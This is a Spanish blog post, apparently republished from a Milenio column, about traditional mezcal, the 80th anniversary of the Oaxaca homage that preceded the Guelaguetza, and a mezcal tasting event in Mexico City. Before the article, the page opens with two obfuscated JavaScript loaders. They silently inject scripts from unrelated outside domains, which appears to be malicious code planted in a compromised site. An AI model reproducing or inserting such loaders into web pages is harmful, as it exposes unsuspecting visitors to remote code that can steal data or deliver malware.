;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 136. Oaxaca festeja 80 años de Guelaguetza

136. Oaxaca festeja 80 años de Guelaguetza


Maestro Mezcalillero Gregorio Hernández. La Compañía, Ejutla, OaxacaDisfrutando una jícara con mezcal de puntas de maguey Barril y San Martinero a 60.5°, vino a mi memoria el 80 aniversario del Homenaje racial a la Ciudad de Oaxaca que, con motivo de los 400 años de su fundación, organizó el gobierno estatal de Francisco López en abril de ése año. El homenaje, antecedente de las fiestas del Lunes del Cerro o Guelaguetza, tuvo como fin que las diferentes “razas” (según documento del comité organizador) provenientes de distintas regiones del estado, rindieran honores a la ciudad de Oaxaca.

En la Guelaguetza actual, “destaca el espectáculo de música, danza, bailes y cantos en el que cada delegación presenta una muestra de su patrimonio cultural, vistiendo indumentaria de sus respectivos pueblos. Al terminar su participación, cada grupo distribuye entre el público su Guelaguetza compuesta por productos característicos de sus respectivas regiones” (www.oaxaca.travel/guelaguetza2012/sitio_2.html). Respecto al origen del evento, vale la pena revisar Tipos raciales y proyectos culturales en Oaxaca, 1920-1940, Deborah Poole, ACERVOS (boletín de los archivos y bibliotecas de Oaxaca) #16, abril-junio de 2000.

Al visitar Oaxaca en esta o en cualquier temporada, obligado es acercarse a su gastronomía, declarada patrimonio cultural inmaterial (PCI) por el Congreso local en 2008, PCI del que son parte fundamental los Mezcales Tradicionales.

Quienes visiten Oaxaca en esta temporada y quieran conocer exquisitos MT, soliciten la “Guía para identificar un MT” en info@mezcalestradicionales.com.mx, imprímanla y utilícenla para que no les den gato por liebre. Quienes no viajen a Oaxaca, asistan el martes 17 a las 20 horas, en el DF, a SINESTESIA (San Luis Potosí 121, Roma). Saborearemos tres MT elaborados sólo para ocasiones especiales: 1) mezcal de frutas criollas de El Sauz, Ejutla, Oaxaca, 54°; 2) mezcal destilado con frutas, en olla de barro, en Xoyatla, Tepeojuma, Puebla, 47.9°; 3) mezcal de pechuga destilado en Río de Parras, Queréndaro Michoacán, 50.2°.

http://www.milenio.com/cdb/doc/impreso/9153126

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *